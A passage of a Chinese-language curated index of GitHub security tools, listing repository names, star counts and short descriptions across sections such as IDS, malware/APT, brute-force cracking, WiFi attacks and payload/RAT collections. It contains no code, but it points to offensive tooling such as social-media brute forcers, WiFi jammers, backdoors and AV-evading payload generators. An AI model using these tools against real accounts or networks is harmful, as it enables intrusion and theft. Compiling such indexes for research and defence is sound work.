[puppetlabs/puppetlabs-firewall](https://github.com/puppetlabs/puppetlabs-firewall) Puppet Firewall Module\n- [**240**星][7d] [Shell] [essandess/macos-fortress](https://github.com/essandess/macos-fortress) Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav)\n- [**220**星][1y] [Go] [maksadbek/tcpovericmp](https://github.com/maksadbek/tcpovericmp) TCP implementation over ICMP protocol to bypass firewalls\n\n\n### IDS&&IPS\n\n\n- [**2938**星][4d] [Zeek] [zeek/zeek](https://github.com/zeek/zeek) Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.\n- [**2852**星][10d] [C] [ossec/ossec-hids](https://github.com/ossec/ossec-hids) 入侵检测系统\n- [**1622**星][2m] [Go] [ysrc/yulong-hids](https://github.com/ysrc/yulong-hids) 一款由 YSRC 开源的主机入侵检测系统\n- [**1325**星][9d] [C] [oisf/suricata](https://github.com/OISF/suricata) a network IDS, IPS and NSM engine\n- [**581**星][5d] [Py] [0kee-team/watchad](https://github.com/0kee-team/watchad) AD Security Intrusion Detection System\n- [**512**星][5m] [C] [decaf-project/decaf](https://github.com/decaf-project/DECAF) DECAF (short for Dynamic Executable Code Analysis Framework) is a binary analysis platform based on QEMU. This is also the home of the DroidScope dynamic Android malware analysis platform. DroidScope is now an extension to DECAF.\n- [**499**星][8m] [Shell] [stamusnetworks/selks](https://github.com/stamusnetworks/selks) A Suricata based IDS/IPS distro\n- [**383**星][7m] [jnusimba/androidsecnotes](https://github.com/jnusimba/androidsecnotes) some learning notes about Android Security\n- [**298**星][4d] [C] [ebwi11/agentsmith-hids](https://github.com/EBWi11/AgentSmith-HIDS) By Kprobe technology Open Source Host-based Intrusion Detection System(HIDS), from E_Bwill.\n- [**248**星][1y] [Perl] [mrash/psad](https://github.com/mrash/psad) iptables 的入侵检测和日志分析\n- [**225**星][1m] [Py] [secureworks/dalton](https://github.com/secureworks/dalton) 使用预定义/指定的规则, 针对IDS传感器(例如Snort/Suricata)进行网络数据包捕获\n\n\n### 隐私保护&&Privacy\n\n\n- [**3236**星][5m] [Go] [meshbird/meshbird](https://github.com/meshbird/meshbird) cloud-native multi-region multi-cloud decentralized private networking\n- [**1069**星][20d] [Py] [yelp/detect-secrets](https://github.com/yelp/detect-secrets) An enterprise friendly way of detecting and preventing secrets in code.\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# SoftwareDefinedRadio\n\n\n***\n\n\n## 工具\n\n\n- [**934**星][1y] [C++] [miek/inspectrum](https://github.com/miek/inspectrum) analysing captured signals, primarily from software-defined radio receivers.\n- [**454**星][10m] [C] [martinmarinov/tempestsdr](https://github.com/martinmarinov/tempestsdr) Remote video eavesdropping using a software-defined radio platform\n- [**369**星][4d] [Py] [p1sec/qcsuper](https://github.com/p1sec/qcsuper) QCSuper is a tool communicating with Qualcomm-based phones and modems, allowing to capture raw 2G/3G/4G radio frames, among other things.\n\n\n***\n\n\n## 文章\n\n\n\n\n# LOLBin&&LOLScript\n\n\n***\n\n\n## 工具\n\n\n- [**1433**星][1m] [XSLT] [lolbas-project/lolbas](https://github.com/lolbas-project/lolbas) Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)\n- [**1349**星][1y] [XSLT] [api0cradle/lolbas](https://github.com/api0cradle/lolbas) Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)\n\n\n***\n\n\n## 文章\n\n\n\n\n# 日志&&Log\n\n\n***\n\n\n## 工具\n\n\n\n\n***\n\n\n## 文章\n\n\n\n\n# 威胁狩猎&&ThreatHunt\n\n\n***\n\n\n## 工具\n\n\n### 未分类\n\n\n- [**1998**星][10d] [Py] [momosecurity/aswan](https://github.com/momosecurity/aswan) 陌陌风控系统静态规则引擎,零基础简易便捷的配置多种复杂规则,实时高效管控用户异常行为。\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# Crypto&&加密&&密码学\n\n\n***\n\n\n## 工具\n\n\n- [**2151**星][5d] [Java] [google/wycheproof](https://github.com/google/wycheproof) Project Wycheproof tests crypto libraries against known attacks.\n- [**1077**星][3m] [C] [tpruvot/cpuminer-multi](https://github.com/tpruvot/cpuminer-multi) crypto cpuminer (linux + windows)\n- [**448**星][14d] [Py] [sidechannelmarvels/deadpool](https://github.com/sidechannelmarvels/deadpool) Repository of various public white-box cryptographic implementations and their practical attacks.\n- [**378**星][2m] [C++] [crypto2011/idr](https://github.com/crypto2011/idr) Interactive Delphi Reconstructor\n- [**214**星][5m] [Shell] [cryptolok/crykex](https://github.com/cryptolok/crykex) Linux Memory Cryptographic Keys Extractor\n\n\n***\n\n\n## 文章\n\n\n\n\n# 恶意代码&&Malware&&APT\n\n\n***\n\n\n## 工具\n\n\n- [**2058**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。\n - 重复区段: [渗透->工具->未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e) |\n- [**893**星][1m] [aptnotes/data](https://github.com/aptnotes/data) APTnotes data\n- [**219**星][8d] [JS] [strangerealintel/cyberthreatintel](https://github.com/strangerealintel/cyberthreatintel) Analysis of malware and Cyber Threat Intel of APT and cybercriminals groups\n- [**203**星][4m] [Py] [thesph1nx/absolutezero](https://github.com/thesph1nx/absolutezero) Python APT Backdoor 1.0.0.1\n\n\n***\n\n\n## 文章\n\n\n\n\n# REST_API&&RESTFUL \n\n\n***\n\n\n## 工具\n\n\n- [**1233**星][9m] [Py] [flipkart-incubator/astra](https://github.com/flipkart-incubator/astra) 自动化的REST API安全测试脚本\n\n\n***\n\n\n## 文章\n\n\n\n\n# 蓝牙&&Bluetooth\n\n\n***\n\n\n## 工具\n\n\n- [**274**星][19d] [Py] [ghostop14/sparrow-wifi](https://github.com/ghostop14/sparrow-wifi) Next-Gen GUI-based WiFi and Bluetooth Analyzer for Linux\n - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) |\n- [**201**星][t] [Py] [seemoo-lab/internalblue](https://github.com/seemoo-lab/internalblue) Bluetooth experimentation framework for Broadcom and Cypress chips.\n\n\n***\n\n\n## 文章\n\n\n\n\n# 浏览器&&browser\n\n\n***\n\n\n## 工具\n\n\n- [**4672**星][5d] [JS] [beefproject/beef](https://github.com/beefproject/beef) The Browser Exploitation Framework Project\n- [**970**星][9m] [Py] [selwin/python-user-agents](https://github.com/selwin/python-user-agents) A Python library that provides an easy way to identify devices like mobile phones, tablets and their capabilities by parsing (browser) user agent strings.\n- [**883**星][3m] [escapingbug/awesome-browser-exploit](https://github.com/escapingbug/awesome-browser-exploit) awesome list of browser exploitation tutorials\n- [**459**星][2m] [Py] [globaleaks/tor2web](https://github.com/globaleaks/tor2web) Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers\n- [**455**星][12d] [m1ghtym0/browser-pwn](https://github.com/m1ghtym0/browser-pwn) An updated collection of resources targeting browser-exploitation.\n- [**411**星][3m] [Pascal] [felipedaragon/sandcat](https://github.com/felipedaragon/sandcat) 为渗透测试和开发者准备的轻量级浏览器, 基于Chromium和Lua\n- [**320**星][3m] [xsleaks/xsleaks](https://github.com/xsleaks/xsleaks) A collection of browser-based side channel attack vectors.\n- [**232**星][1y] [C#] [djhohnstein/sharpweb](https://github.com/djhohnstein/sharpweb) .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.\n- [**217**星][3m] [Py] [icsec/airpwn-ng](https://github.com/icsec/airpwn-ng) force the target's browser to do what we want \n\n\n***\n\n\n## 文章\n\n\n\n\n# MitreATT&CK\n\n\n***\n\n\n## 工具\n\n\n### 未分类的\n\n\n- [**2758**星][] [PS] [redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team) Small and highly portable detection tests based on MITRE's ATT&CK.\n- [**1396**星][2d] [Py] [mitre/caldera](https://github.com/mitre/caldera) 自动化 adversary emulation 系统\n- [**568**星][6m] [HTML] [nshalabi/attack-tools](https://github.com/nshalabi/attack-tools) Utilities for MITRE™ ATT&CK\n- [**491**星][1y] [bfuzzy/auditd-attack](https://github.com/bfuzzy/auditd-attack) A Linux Auditd rule set mapped to MITRE's Attack Framework\n- [**478**星][3m] [Py] [olafhartong/threathunting](https://github.com/olafhartong/threathunting) A Splunk app mapped to MITRE ATT&CK to guide your threat hunts\n- [**344**星][6m] [teoseller/osquery-attck](https://github.com/teoseller/osquery-attck) Mapping the MITRE ATT&CK Matrix with Osquery\n- [**333**星][t] [Py] [atc-project/atomic-threat-coverage](https://github.com/atc-project/atomic-threat-coverage) Actionable analytics designed to combat threats based on MITRE's ATT&CK.\n- [**312**星][11m] [PS] [cyb3rward0g/invoke-attackapi](https://github.com/cyb3rward0g/invoke-attackapi) A PowerShell script to interact with the MITRE ATT&CK Framework via its own API\n- [**201**星][3m] [infosecn1nja/awesome-mitre-attack](https://github.com/infosecn1nja/awesome-mitre-attack) A curated list of awesome resources related to Mitre ATT&CK™ Framework\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 破解&&Crack&&爆破&&BruteForce\n\n\n***\n\n\n## 工具\n\n\n### 未分类的\n\n\n- [**3325**星][1m] [C] [vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra) 网络登录破解,支持多种服务\n- [**1925**星][29d] [Py] [lanjelot/patator](https://github.com/lanjelot/patator) Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.\n- [**1096**星][4m] [Py] [landgrey/pydictor](https://github.com/landgrey/pydictor) A powerful and useful hacker dictionary builder for a brute-force attack\n- [**898**星][3m] [Py] [trustedsec/hate_crack](https://github.com/trustedsec/hate_crack) 使用HashCat 的自动哈希破解工具\n- [**894**星][29d] [Py] [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) 测试,调整和破解JSON Web Token 的工具包\n- [**857**星][7m] [C] [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) C 语言编写的 JWT 爆破工具\n- [**803**星][11m] [Py] [mak-/parameth](https://github.com/mak-/parameth) 在文件中(例如PHP 文件)暴力搜索GET 和 POST 请求的参数\n- [**763**星][5m] [Py] [s0md3v/hash-buster](https://github.com/s0md3v/Hash-Buster) Crack hashes in seconds.\n- [**690**星][8m] [Shell] [1n3/brutex](https://github.com/1n3/brutex) Automatically brute force all services running on a target.\n- [**687**星][9d] [JS] [animir/node-rate-limiter-flexible](https://github.com/animir/node-rate-limiter-flexible) Node.js rate limit requests by key with atomic increments. Protection from DDoS and Brute-Force attacks in process Memory, Redis, MongoDb, Memcached, MySQL, PostgreSQL, Cluster or PM\n- [**659**星][5m] [C#] [shack2/snetcracker](https://github.com/shack2/snetcracker) 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。\n- [**588**星][6m] [PHP] [s3inlc/hashtopolis](https://github.com/s3inlc/hashtopolis) Hashcat wrapper, 用于跨平台分布式Hash破解\n- [**563**星][2m] [Py] [pure-l0g1c/instagram](https://github.com/pure-l0g1c/instagram) Bruteforce attack for Instagram\n- [**559**星][1y] [CSS] [hashview/hashview](https://github.com/hashview/hashview) 密码破解和分析工具\n- [**538**星][27d] [C] [nmap/ncrack](https://github.com/nmap/ncrack) Ncrack network authentication tool\n- [**528**星][3m] [Py] [ypeleg/hungabunga](https://github.com/ypeleg/hungabunga) HungaBunga: Brute-Force all sklearn models with all parameters using .fit .predict!\n- [**520**星][4m] [duyetdev/bruteforce-database](https://github.com/duyetdev/bruteforce-database) Bruteforce database\n- [**490**星][1y] [C] [mikeryan/crackle](https://github.com/mikeryan/crackle) Crack and decrypt BLE encryption\n- [**451**星][6m] [JS] [coalfire-research/npk](https://github.com/coalfire-research/npk) A mostly-serverless distributed hash cracking platform\n- [**442**星][1y] [C] [ryancdotorg/brainflayer](https://github.com/ryancdotorg/brainflayer) A proof-of-concept cracker for cryptocurrency brainwallets and other low entropy key alogrithms.\n- [**358**星][2m] [Py] [denyhosts/denyhosts](https://github.com/denyhosts/denyhosts) Automated host blocking from SSH brute force attacks\n- [**356**星][28d] [Java] [wycm/selenium-geetest-crack](https://github.com/wycm/selenium-geetest-crack) selenium破解滑动验证码\n- [**332**星][11m] [C] [e-ago/bitcracker](https://github.com/e-ago/bitcracker) BitLocker密码破解器\n- [**309**星][8d] [Go] [ropnop/kerbrute](https://github.com/ropnop/kerbrute) A tool to perform Kerberos pre-auth bruteforcing\n- [**304**星][2m] [Py] [yzddmr6/webcrack](https://github.com/yzddmr6/webcrack) 网站后台弱口令/万能密码批量检测工具\n- [**292**星][12m] [Shell] [cyb0r9/socialbox](https://github.com/Cyb0r9/SocialBox) SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi\n- [**286**星][9d] [Shell] [wuseman/emagnet](https://github.com/wuseman/emagnet) Emagnet is a tool for find leaked databases with 97.1% accurate to grab mail + password together from pastebin leaks. Support for brute forcing spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts\n- [**275**星][1y] [C] [jmk-foofus/medusa](https://github.com/jmk-foofus/medusa) Medusa is a speedy, parallel, and modular, login brute-forcer.\n- [**274**星][1y] [Shell] [thelinuxchoice/instainsane](https://github.com/thelinuxchoice/instainsane) Multi-threaded Instagram Brute Forcer (100 attemps at once)\n- [**250**星][1y] [Py] [avramit/instahack](https://github.com/avramit/instahack) Instagram bruteforce tool\n- [**250**星][1y] [Py] [hsury/geetest3-crack](https://github.com/hsury/geetest3-crack) \n- [**248**星][11d] [Py] [evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) 修改NTLMv1/NTLMv1-ESS/MSCHAPv1 Hask, 使其可以在hashcat中用DES模式14000破解\n- [**235**星][7m] [Py] [blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) Python 3.5+ DNS asynchronous brute force utility\n- [**233**星][8m] [Py] [paradoxis/stegcracker](https://github.com/paradoxis/stegcracker) Steganography brute-force utility to uncover hidden data inside files\n- [**221**星][12m] [Py] [chris408/known_hosts-hashcat](https://github.com/chris408/known_hosts-hashcat) A guide and tool for cracking ssh known_hosts files with hashcat\n- [**219**星][4m] [Py] [isaacdelly/plutus](https://github.com/isaacdelly/plutus) An automated bitcoin wallet collider that brute forces random wallet addresses\n- [**215**星][2m] [C] [hyc/fcrackzip](https://github.com/hyc/fcrackzip) A braindead program for cracking encrypted ZIP archives. Forked from\n- [**207**星][27d] [Py] [m4ll0k/smbrute](https://github.com/m4ll0k/smbrute) SMB Protocol Bruteforce\n- [**206**星][5m] [Shell] [anshumanbh/brutesubs](https://github.com/anshumanbh/brutesubs) An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose\n- [**204**星][1y] [JS] [lmammino/jwt-cracker](https://github.com/lmammino/jwt-cracker) jwt-cracker:HS256JWT 令牌暴力破解工具,只对弱密码有效\n- [**200**星][1y] [ObjC] [sunweiliang/neteasemusiccrack](https://github.com/sunweiliang/neteasemusiccrack) iOS网易云音乐 免VIP下载、去广告、去更新 无需越狱...\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 泄漏&&Breach&&Leak\n\n\n***\n\n\n## 工具\n\n\n### 未分类\n\n\n- [**1437**星][6m] [gitguardian/apisecuritybestpractices](https://github.com/gitguardian/apisecuritybestpractices) Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian.\n- [**1398**星][1y] [Go] [filosottile/whosthere](https://github.com/filosottile/whosthere) A ssh server that knows who you are\n- [**1147**星][3m] [HTML] [cure53/httpleaks](https://github.com/cure53/httpleaks) HTTPLeaks - All possible ways, a website can leak HTTP requests\n- [**906**星][2m] [Py] [woj-ciech/leaklooker](https://github.com/woj-ciech/leaklooker) Find open databases - Powered by Binaryedge.io\n- [**862**星][3d] [Py] [circl/ail-framework](https://github.com/circl/ail-framework) AIL framework - Analysis Information Leak framework\n- [**728**星][2m] [streaak/keyhacks](https://github.com/streaak/keyhacks) Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.\n- [**726**星][3d] [Py] [globaleaks/globaleaks](https://github.com/globaleaks/globaleaks) The Open-Source Whistleblowing Software\n- [**301**星][5m] [Py] [wangyihang/githacker](https://github.com/wangyihang/githacker) a multiple threads tool to detect whether a site has git source leaks, and has the ability to download the site source to the local\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 爬虫\n\n\n***\n\n\n## 工具\n\n\n### 未分类\n\n\n- [**758**星][2m] [Py] [nekmo/dirhunt](https://github.com/nekmo/dirhunt) Web爬虫, 针对搜索和分析路径做了优化\n - 重复区段: [扫描器->工具->未分类-Scanner](#de63a029bda6a7e429af272f291bb769) |\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 无线&&WiFi&&AP&&802.11\n\n\n***\n\n\n## 未分类-WiFi\n\n\n- [**8455**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试\n - 重复区段: [社工(SET)->工具->钓鱼](#290e9ae48108d21d6d8b9ea9e74d077d) |\n- [**6140**星][10m] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 检测 Wifi 信号统计你周围的人数\n - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |\n- [**5824**星][2m] [C] [spacehuhn/esp8266_deauther](https://github.com/spacehuhn/esp8266_deauther) 使用ESP8266 制作Wifi干扰器\n- [**4494**星][19d] [Py] [jopohl/urh](https://github.com/jopohl/urh) Universal Radio Hacker: investigate wireless protocols like a boss\n- [**2989**星][5d] [JS] [evilsocket/pwnagotchi](https://github.com/evilsocket/pwnagotchi) 深度学习+Bettercap,基于A2C,从周围的WiFi环境中学习,以最大程度地利用捕获的WPA关键信息\n- [**2939**星][4d] [Py] [danmcinerney/wifijammer](https://github.com/danmcinerney/wifijammer) 持续劫持范围内的Wifi客户端和AP\n- [**2756**星][9m] [Py] [p0cl4bs/wifi-pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) AP攻击框架, 创建虚假网络, 取消验证攻击、请求和凭证监控、透明代理、Windows更新攻击、钓鱼管理、ARP投毒、DNS嗅探、Pumpkin代理、动态图片捕获等\n- [**2745**星][1y] [C] [vanhoefm/krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) 检测客户端和AP是否受KRACK漏洞影响\n- [**2476**星][3m] [C] [martin-ger/esp_wifi_repeater](https://github.com/martin-ger/esp_wifi_repeater) A full functional WiFi Repeater (correctly: a WiFi NAT Router)\n- [**2378**星][1y] [Py] [danmcinerney/lans.py](https://github.com/danmcinerney/lans.py) Inject code and spy on wifi users\n- [**2303**星][2m] [Shell] [v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) This is a multi-use bash script for Linux systems to audit wireless networks.\n- [**1924**星][1y] [Py] [derv82/wifite2](https://github.com/derv82/wifite2) 无线网络审计工具wifite 的升级版/重制版\n- [**1881**星][5m] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本\n - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |\n- [**1567**星][25d] [Py] [k4m4/kickthemout](https://github.com/k4m4/kickthemout) 使用ARP欺骗,将设备从网络中踢出去\n- [**1424**星][19d] [C] [ettercap/ettercap](https://github.com/ettercap/ettercap) Ettercap Project\n- [**1286**星][4d] [C] [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) WiFi security auditing tools suite\n- [**1280**星][2m] [C] [seemoo-lab/nexmon](https://github.com/seemoo-lab/nexmon) The C-based Firmware Patching Framework for Broadcom/Cypress WiFi Chips that enables Monitor Mode, Frame Injection and much more\n- [**1057**星][2d] [C] [s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) 针对WPA2-Enterprise 网络的定向双重攻击(evil twin attacks)\n- [**1038**星][2m] [C] [t6x/reaver-wps-fork-t6x](https://github.com/t6x/reaver-wps-fork-t6x) 攻击 Wi-Fi Protected Setup (WPS), 恢复 WPA/WPA2 密码\n- [**1007**星][1y] [Py] [entropy1337/infernal-twin](https://github.com/entropy1337/infernal-twin) 自动化无线Hack 工具\n- [**994**星][1y] [Py] [tylous/sniffair](https://github.com/tylous/sniffair) 无线渗透框架. 解析被动收集的无线数据, 执行复杂的无线攻击\n- [**991**星][2m] [C] [wiire-a/pixiewps](https://github.com/wiire-a/pixiewps) An offline Wi-Fi Protected Setup brute-force utility\n- [**985**星][1y] [HTML] [sensepost/mana](https://github.com/sensepost/mana) *DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM\n- [**916**星][2m] [TeX] [ethereum/yellowpaper](https://github.com/ethereum/yellowpaper) The \"Yellow Paper\": Ethereum's formal specification\n- [**854**星][2m] [C] [spacehuhn/wifi_ducky](https://github.com/spacehuhn/wifi_ducky) Upload, save and run keystroke injection payloads with an ESP8266 + ATMEGA32U4\n- [**799**星][1y] [ObjC] [igrsoft/kismac2](https://github.com/igrsoft/kismac2) KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.\n- [**781**星][2m] [Py] [konradit/gopro-py-api](https://github.com/konradit/gopro-py-api) Unofficial GoPro API Library for Python - connect to GoPro via WiFi.\n- [**761**星][8m] [Py] [misterbianco/boopsuite](https://github.com/MisterBianco/BoopSuite) 无线审计与安全测试\n- [**685**星][11m] [ObjC] [unixpickle/jamwifi](https://github.com/unixpickle/jamwifi) A GUI, easy to use WiFi network jammer for Mac OS X\n- [**654**星][8m] [C] [wifidog/wifidog-gateway](https://github.com/wifidog/wifidog-gateway) Repository for the wifidog-gateway captive portal designed for embedded systems\n- [**617**星][4m] [C] [matheus-garbelini/esp32_esp8266_attacks](https://github.com/matheus-garbelini/esp32_esp8266_attacks) Proof of Concept of ESP32/8266 Wi-Fi vulnerabilties (CVE-2019-12586, CVE-2019-12587, CVE-2019-12588)\n- [**527**星][] [C++] [cyberman54/esp32-paxcounter](https://github.com/cyberman54/esp32-paxcounter) Wifi & BLE driven passenger flow metering with cheap ESP32 boards\n- [**477**星][3m] [Shell] [staz0t/hashcatch](https://github.com/staz0t/hashcatch) Capture handshakes of nearby WiFi networks automatically\n- [**467**星][2m] [Py] [savio-code/fern-wifi-cracker](https://github.com/savio-code/fern-wifi-cracker) 无线安全审计和攻击工具, 能破解/恢复 WEP/WPA/WPSkey等\n- [**462**星][21d] [Java] [lennartkoopmann/nzyme](https://github.com/lennartkoopmann/nzyme) 直接收集空中的802.11 管理帧,并将其发送到 Graylog,用于WiFi IDS, 监控, 及事件响应。(Graylog:开源的日志管理系统)\n- [**419**星][9d] [Py] [jpaulmora/pyrit](https://github.com/jpaulmora/pyrit) The famous WPA precomputed cracker, Migrated from Google.\n- [**397**星][4d] [C] [freifunk-gluon/gluon](https://github.com/freifunk-gluon/gluon) a modular framework for creating OpenWrt-based firmwares for wireless mesh nodes\n- [**384**星][5d] [C++] [bastibl/gr-ieee802-11](https://github.com/bastibl/gr-ieee802-11) IEEE 802.11 a/g/p Transceiver\n- [**327**星][3m] [Shell] [vanhoefm/modwifi](https://github.com/vanhoefm/modwifi) \n- [**321**星][4d] [Java] [wiglenet/wigle-wifi-wardriving](https://github.com/wiglenet/wigle-wifi-wardriving) Nethugging client for Android, from wigle.net\n- [**313**星][4m] [TeX] [chronaeon/beigepaper](https://github.com/chronaeon/beigepaper) Rewrite of the Yellowpaper in non-Yellowpaper syntax.\n- [**278**星][3m] [C] [sensepost/hostapd-mana](https://github.com/sensepost/hostapd-mana) SensePost's modified hostapd for wifi attacks.\n- [**277**星][18d] [C] [br101/horst](https://github.com/br101/horst) “horst” - lightweight IEEE802.11 wireless LAN analyzer with a text interface\n- [**274**星][19d] [Py] [ghostop14/sparrow-wifi](https://github.com/ghostop14/sparrow-wifi) Next-Gen GUI-based WiFi and Bluetooth Analyzer for Linux\n - 重复区段: [蓝牙->工具](#c72811e491c68f75ac2e7eb7afd3b01f) |\n- [**260**星][1y] [Py] [wipi-hunter/pidense](https://github.com/wipi-hunter/pidense) Monitor illegal wireless network activities.\n- [**255**星][1m] [C] [mame82/logitacker](https://github.com/mame82/logitacker) Enumerate and test Logitech wireless input devices for vulnerabilities with a nRF52840 radio dongle.\n- [**240**星][8m] [Py] [lionsec/wifresti](https://github.com/lionsec/wifresti) Find your wireless network password in Windows , Linux and Mac OS\n- [**212**星][1m] [Shell] [aress31/wirespy](https://github.com/aress31/wirespy) Framework designed to automate various wireless networks attacks (the project was presented on Pentester Academy TV's toolbox in 2017).\n\n\n***\n\n\n## WPS&&WPA&&WPA2\n\n\n- [**319**星][4m] [Py] [hash3lizer/wifibroot](https://github.com/hash3lizer/wifibroot) A WiFi Pentest Cracking tool for WPA/WPA2 (Handshake, PMKID, Cracking, EAPOL, Deauthentication)\n\n\n***\n\n\n## 802.11\n\n\n\n\n# Payload&&远控&&RAT\n\n\n***\n\n\n## 工具\n\n\n### 未分类-payload\n\n\n- [**1829**星][6m] [Py] [veil-framework/veil](https://github.com/veil-framework/veil) generate metasploit payloads that bypass common anti-virus solutions\n- [**1258**星][2m] [PS] [hak5/bashbunny-payloads](https://github.com/hak5/bashbunny-payloads) The Official Bash Bunny Payload Repository\n- [**982**星][2m] [C] [zardus/preeny](https://github.com/zardus/preeny) Some helpful preload libraries for pwning stuff.\n- [**569**星][11m] [Py] [genetic-malware/ebowla](https://github.com/genetic-malware/ebowla) Framework for Making Environmental Keyed Payloads (NO LONGER SUPPORTED)\n- [**546**星][3m] [C++] [screetsec/brutal](https://github.com/screetsec/brutal) Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )\n- [**493**星][5d] [Py] [ctxis/cape](https://github.com/ctxis/cape) Malware Configuration And Payload Extraction\n- [**343**星][8m] [Java] [portswigger/param-miner](https://github.com/portswigger/param-miner) identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities\n- [**339**星][12m] [JS] [gabemarshall/brosec](https://github.com/gabemarshall/brosec) Brosec - An interactive reference tool to help security professionals utilize useful payloads and commands.\n- [**288**星][1m] [Shell] [petit-miner/blueberry-pi](https://github.com/petit-miner/blueberry-pi) Blueberry PI\n- [**262**星][2m] [Py] [felixweyne/imaginaryc2](https://github.com/felixweyne/imaginaryc2) Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.\n- [**246**星][13d] [C] [shchmue/lockpick_rcm](https://github.com/shchmue/lockpick_rcm) Nintendo Switch encryption key derivation bare metal RCM payload\n- [**244**星][7d] [cujanovic/open-redirect-payloads](https://github.com/cujanovic/open-redirect-payloads) Open Redirect Payloads\n- [**238**星][6d] [cujanovic/markdown-xss-payloads](https://github.com/cujanovic/markdown-xss-payloads) XSS payloads for exploiting Markdown syntax\n- [**235**星][5m] [Shell] [hak5/packetsquirrel-payloads](https://github.com/hak5/packetsquirrel-payloads) The Official Packet Squirrel Payload Repository\n- [**233**星][6m] [cr0hn/nosqlinjection_wordlists](https://github.com/cr0hn/nosqlinjection_wordlists) This repository contains payload to test NoSQL Injections\n- [**232**星][18d] [PS] [rsmudge/elevatekit](https://github.com/rsmudge/elevatekit) The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.\n- [**229**星][3m] [Py] [whitel1st/docem](https://github.com/whitel1st/docem) Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)\n- [**227**星][2m] [Py] [brent-stone/can_reverse_engineering](https://github.com/brent-stone/can_reverse_engineering) Automated Payload Reverse Engineering Pipeline for the Controller Area Network (CAN) protocol\n- [**217**星][2m] [PHP] [zigoo0/jsonbee](https://github.com/zigoo0/jsonbee) A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites.\n- [**210**星][4d] [Py] [danmcinerney/msf-autoshell](https://github.com/danmcinerney/msf-autoshell) Feed the tool a .nessus file and it will automatically get you MSF shell\n\n\n### Payload收集\n\n\n- [**22055**星][20d] [PHP] [danielmiessler/seclists](https://github.com/danielmiessler/seclists) 多种类型资源收集:用户名、密码、URL、敏感数据类型、Fuzzing Payload、WebShell等\n- [**11389**星][3d] [Py] [swisskyrepo/payloadsallthethings](https://github.com/swisskyrepo/payloadsallthethings) A list of useful payloads and bypass for Web Application Security and Pentest/CTF\n- [**2078**星][2m] [edoverflow/bugbounty-cheatsheet](https://github.com/edoverflow/bugbounty-cheatsheet) A list of interesting payloads, tips and tricks for bug bounty hunters.\n- [**2057**星][9m] [Shell] [foospidy/payloads](https://github.com/foospidy/payloads) web 攻击 Payload 集合\n- [**1870**星][11m] [PHP] [bartblaze/php-backdoors](https://github.com/bartblaze/php-backdoors) A collection of PHP backdoors. For educational or testing purposes only.\n- [**783**星][19d] [payloadbox/xss-payload-list](https://github.com/payloadbox/xss-payload-list) XSS 漏洞Payload列表\n- 